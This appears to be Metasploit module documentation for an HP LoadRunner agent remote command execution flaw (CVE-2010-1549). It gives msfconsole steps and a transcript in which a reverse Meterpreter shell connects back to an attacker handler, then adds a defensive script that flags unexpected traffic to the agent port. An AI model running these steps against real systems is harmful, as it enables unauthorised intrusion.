## Vulnerable Application

HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)

This module exploits a remote command execution vulnerability in HP LoadRunner before 9.50 and also HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely. The service is vulnerable provided the Secure Channel feature is disabled (default).

During testing, additional versions were verified to be vulnerable. The following list documents them:

- HP LoadRunner 12.53 Community Edition (non-default SSL turned off)

HP LoadRunner 9.50 or below, or a version documented above.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: ```use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec```
4. Do: ```set RHOST [ip]```
5. Do: ```run```
6. You should get a shell.

## Scenarios

### Win7 OS with HP LoadRunner 12.53 Community Edition

```
msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
msf exploit(hp_loadrunner_magentproc_cmdexec) > set RHOST victim
RHOST => victim
msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444
[*] victim:54345 - Sending payload...
[*] victim:54345 - Command Stager progress - 1.47% done (1499/102292 bytes)
[*] victim:54345 - Command Stager progress - 2.93% done (2998/102292 bytes)
[*] victim:54345 - Command Stager progress - 4.40% done (4497/102292 bytes)
[*] victim:54345 - Command Stager progress - 5.86% done (5996/102292 bytes)
[*] victim:54345 - Command Stager progress - 7.33% done (7495/102292 bytes)
...snip...
[*] victim:54345 - Command Stager progress - 92.32% done (94437/102292 bytes)
[*] victim:54345 - Command Stager progress - 93.79% done (95936/102292 bytes)
[*] victim:54345 - Command Stager progress - 95.25% done (97435/102292 bytes)
[*] victim:54345 - Command Stager progress - 96.72% done (98934/102292 bytes)
[*] victim:54345 - Command Stager progress - 98.15% done (100400/102292 bytes)
[*] victim:54345 - Command Stager progress - 99.55% done (101827/102292 bytes)
[*] victim:54345 - Command Stager progress - 100.00% done (102292/102292 bytes)
[*] Sending stage (179267 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55556) at 2017-11-09 03:53:08 +1100

meterpreter > sysinfo
Computer : TARGET
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_AU
Domain : DOMAIN
Logged On Users : 3
Meterpreter : x86/windows
meterpreter >
Background session 1? [y/N]
```
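
For defenders, the scenario above shows the module talking to the agent on TCP port 54345, so traffic to that port from anything other than a known LoadRunner controller deserves a look. The following is an added example, not part of the original module documentation: it triages flow records for such connections. The `key=value` log format, the sample records and the controller allowlist are all constructed assumptions.

```python
import re
from collections import defaultdict

AGENT_PORT = 54345  # port the module output above connects to

# Constructed sample flow records in a hypothetical key=value format.
SAMPLE_LOG = """\
2017-11-09T03:52:40 src=10.0.0.5 dst=10.0.0.20 dport=54345 bytes=2100 action=allow
2017-11-09T03:52:41 src=10.0.9.77 dst=10.0.0.20 dport=54345 bytes=1499 action=allow
2017-11-09T03:52:42 src=10.0.9.77 dst=10.0.0.20 dport=54345 bytes=1499 action=allow
2017-11-09T03:52:43 src=10.0.9.77 dst=10.0.0.21 dport=443 bytes=900 action=allow
2017-11-09T03:52:44 src=10.0.9.80 dst=10.0.0.20 dport=54345 bytes=60 action=deny
malformed line without fields
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")
REQUIRED = {"src", "dst", "dport", "bytes", "action"}


def parse_record(line):
    """Return a dict of fields, or None when the line is incomplete or malformed."""
    fields = dict(FIELD_RE.findall(line))
    if not REQUIRED <= fields.keys():
        return None
    try:
        fields["dport"] = int(fields["dport"])
        fields["bytes"] = int(fields["bytes"])
    except ValueError:
        return None
    return fields


def unexpected_agent_clients(log_text, controllers):
    """Summarise agent-port traffic per (src, dst) for sources not in `controllers`."""
    hits = defaultdict(lambda: {"allowed": 0, "denied": 0, "bytes": 0})
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None or rec["dport"] != AGENT_PORT or rec["src"] in controllers:
            continue
        entry = hits[(rec["src"], rec["dst"])]
        if rec["action"] == "allow":
            entry["allowed"] += 1
            entry["bytes"] += rec["bytes"]  # only count traffic that reached the agent
        else:
            entry["denied"] += 1
    return dict(hits)


if __name__ == "__main__":
    for (src, dst), stats in unexpected_agent_clients(SAMPLE_LOG, {"10.0.0.5"}).items():
        print(f"{src} -> {dst}:{AGENT_PORT} {stats}")
```

Allowed connections from a non-controller source are the priority finding; denied ones show that filtering is working but that something is probing the agent port.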